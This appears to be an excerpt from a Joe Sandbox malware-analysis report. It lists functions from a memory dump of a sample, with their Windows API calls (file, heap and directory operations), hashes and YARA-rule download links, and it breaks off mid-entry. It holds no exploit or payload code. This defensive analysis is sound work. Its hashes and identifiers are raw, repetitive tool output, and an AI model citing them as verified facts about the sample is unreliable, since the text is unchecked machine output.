Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
Instruction ID: af1ffdf326ee6b9e8f9f4efb185a7a75328b0af80e7613720a9e9424578e33b6
Opcode Fuzzy Hash: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
Instruction Fuzzy Hash: A9416D71A00646CFCB24DF58C48496ABBF1FF48314B2486AED096AB392C371ED46CF94

Function 0040D1AB Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040D1B0

Part of subcall function 0040F8C3: __EH_prolog.LIBCMT ref: 0040F8C8

Part of subcall function 0040D2CF: __EH_prolog.LIBCMT ref: 0040D2D4

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
Instruction ID: 9d10d91046bd1a4dd32f0e664b06ea8990f5f8cc09720d5c411fd584516079ca
Opcode Fuzzy Hash: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
Instruction Fuzzy Hash: 83313031901254DBCB11EFA4C6487EDBBB5AF15304F1440AEE8057B382DB78DE49DBA6

Function 00413EA3 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00413F8A

Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
Instruction ID: 7c2cfac85a053aeac9454e1c2b35b253285297f11283e44f43d764ba5cf7311f
Opcode Fuzzy Hash: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
Instruction Fuzzy Hash: 1A217431E44605EBDB10AFA9DC42BDAB7B4EB01765F10421BF411EB2D0C778AAC28A58

Function 00413F9F Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074), ref: 00414073

Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapInitialize
String ID:
API String ID: 641406236-0
Opcode ID: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
Instruction ID: 47133188c5d3e4a4a91398ef735a592283a7fe3b34e77d79aa204ad2d485eaa9
Opcode Fuzzy Hash: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
Instruction Fuzzy Hash: 8321C572901609EADB20ABA6DC46BDE7B78EF48764F14021BF511B61C0D77C89C18AAD

Function 0040A011 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A016

Part of subcall function 00409C49: __EH_prolog.LIBCMT ref: 00409C4E

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
Instruction ID: 1dffea12e82b47f2a36155f0264cd4dada82ecc0bfe076f3ab6191fd12039e28
Opcode Fuzzy Hash: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
Instruction Fuzzy Hash: 4C118FB0A01254DADB09EBAAC5153EDFBA69FA1318F14419FA542732D2CBF81B048666

Function 004092E9 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004092EE

Part of subcall function 00402634: __EH_prolog.LIBCMT ref: 00402639

Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846

Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog$ExceptionRaise
String ID:
API String ID: 2062786585-0
Opcode ID: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
Instruction ID: f7fbb3e9a8787d76bf0f9f15101cef5fd9d7ebfa1ebb25f778e30044bb5e9d70
Opcode Fuzzy Hash: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
Instruction Fuzzy Hash: 7B01D6766406049ACB10EF25C451ADEBBB1FF95318F00852FE896632E1CB785649CF54

Function 004027A6 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004027AB

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
Instruction ID: 116dfd3529ede02fc162d870fedee277598c738aed7d6567ac0ffa60a71ea666
Opcode Fuzzy Hash: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
Instruction Fuzzy Hash: BCF04F719005069BDB15EB9AC892AEFBBB5FF80308F00403FE142775E2CA787985DB84

Function 0040348A Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040348F

Part of subcall function 0040341C: __EH_prolog.LIBCMT ref: 00403421

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 992754cf2511ef34f08bb84c5a216161d24f870ecf452e3c6c272b3c39413d44
Instruction ID: 0f3c3ef6bb78ddd4e58274a6c6a00c76ada5df03c33c012153acc60b0d36d619
Opcode Fuzzy Hash: 992754cf2511ef34f08bb84c5a216161d24f870ecf452e3c6c272b3c39413d44
Instruction Fuzzy Hash: 4EF090315107009BDB15EF91C80569ABFB8EF08318F04056FE446A76D1CB79EA40CA04

Function 004048B7 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE ref: 004048F1

Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920

Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: File$Attributes$ApisH_prolog
String ID:
API String ID: 3885834519-0
Opcode ID: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
Instruction ID: d8abee0b5bf8aaacd3c7805e8248c04f8c14d25ec22198af343fb12e16f398c4
Opcode Fuzzy Hash: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
Instruction Fuzzy Hash: 76E02B66F002502BC7103BA5AC065DB3B9D9B81314B20C43BA602A3291E9388E44A258

Function 0040499C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000), ref: 004049D0

Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920

Part of subcall function 0040498D: CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CreateDirectory$ApisFileH_prolog
String ID:
API String ID: 1021588753-0
Opcode ID: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
Instruction ID: 2f64d7a75cdf7ff6db5ed191fdbb19fa086d8aebc57dacf92a4c812467fb8a6f
Opcode Fuzzy Hash: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
Instruction Fuzzy Hash: 18E0DFA0B002002BCB147B79AC0679E376D4B80218F10867EA652671E1EA7999449608

Function 004050AB Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNELBASE(?,?,00000000,00000003,?,?,00000000,004050FF,?,?,?,00405160,?,?,?,00000003), ref: 004050CE

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
Instruction ID: d5c13e583cf4c34c7a3a11816bb62f42e40da82da4d3cfe63a6d47b8b5213b5b
Opcode Fuzzy Hash: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
Instruction Fuzzy Hash: 91E086723016106BD71056699C45A4BA7DEDFD8752F15843FB545E3381D6B48C004A78

Function 00405D59 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00405D71

Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: AllocExceptionRaiseString
String ID:
API String ID: 1415472724-0
Opcode ID: 313272d88e3834385c103984260c6c8c9ca4a4ab5fd4d804f695adf0373ca9e7
Instruction ID: d0734d5c7e5939215d37afae748a6b456316f2180b0855a0f59ce99ff0d6cfc1
Opcode Fuzzy Hash: 313272d88e3834385c103984260c6c8c9ca4a4ab5fd4d804f695adf0373ca9e7
Instruction Fuzzy Hash: C0E0E572640704A6C7209F65D8559877BE8EF00385B10C43FF548D6150E779E5508BD8

Function 004058CD Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004058D2

Part of subcall function 00405806: __EH_prolog.LIBCMT ref: 0040580B

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
Instruction ID: 5bfd618a99589873673dbdde5608ad138896477ef474a485a6b18cf586c7d2b5
Opcode Fuzzy Hash: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
Instruction Fuzzy Hash: E7E01A72D410049ACB05BB95E9526EDB778EF51319F10403BA412725919B785E18CA58

Function 00405C87 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00405CAA

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
Instruction ID: 646c0e8b7f70081892c45aa98fa77e415187d9694f298a279afc83584de54578
Opcode Fuzzy Hash: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
Instruction Fuzzy Hash: F8E0E575600208FFCB11CF95C801B8E7BF9EB09364F20C069F914AA260D339EA50DF54

Function 00405841 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00405846

Part of subcall function 004055DE: __EH_prolog.LIBCMT ref: 004055E3
Part of subcall function 004055DE: FindFirstFileW.KERNELBASE(?,?), ref: 00405611

Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: FindH_prolog$CloseFileFirst
String ID:
API String ID: 2004497850-0
Opcode ID: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
Instruction ID: b7fde63f1f0c292b4e5d00ec8c3d5d27a79480d2707f186765d0e2b5b752fd38
Opcode Fuzzy Hash: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
Instruction Fuzzy Hash: 7CE04FB1951506ABCB14DF50CC52AEEB734FB1131CF10421EE021722D08B785648CA28

Function 00405806 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040580B

Part of subcall function 0040553A: FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559

Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: Find$CloseFileFirstH_prolog
String ID:
API String ID: 889498515-0
Opcode ID: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
Instruction ID: 15a52a3ac40e1f9f01e416ae3406c700f8aec04b6379e90cb97043f6baa550c5
Opcode Fuzzy Hash: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
Instruction Fuzzy Hash: 2AE01AB195150AAACB04DB50CC52AEEB760EB1131CF00421AA421722D0877856488A28

Function 0040F8C3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040F8C8

Part of subcall function 0040F648: __EH_prolog.LIBCMT ref: 0040F64D

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
Instruction ID: 6b40bdca6a02cd8c303c1b1c800ac92429027f894e9b325ac65d5e69f4ab0667
Opcode Fuzzy Hash: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
Instruction Fuzzy Hash: 0CD01272911104EBD711AB49D842BDEBB68EB8135DF10853BF00171550C37D56459569

Function 00405B7B Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(000000FF,00000000,?,?,00000000,000000FF,?,00405BC6,00000000,?,00000000,?,00405BEC,00000000,?,00000000), ref: 00405B91

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
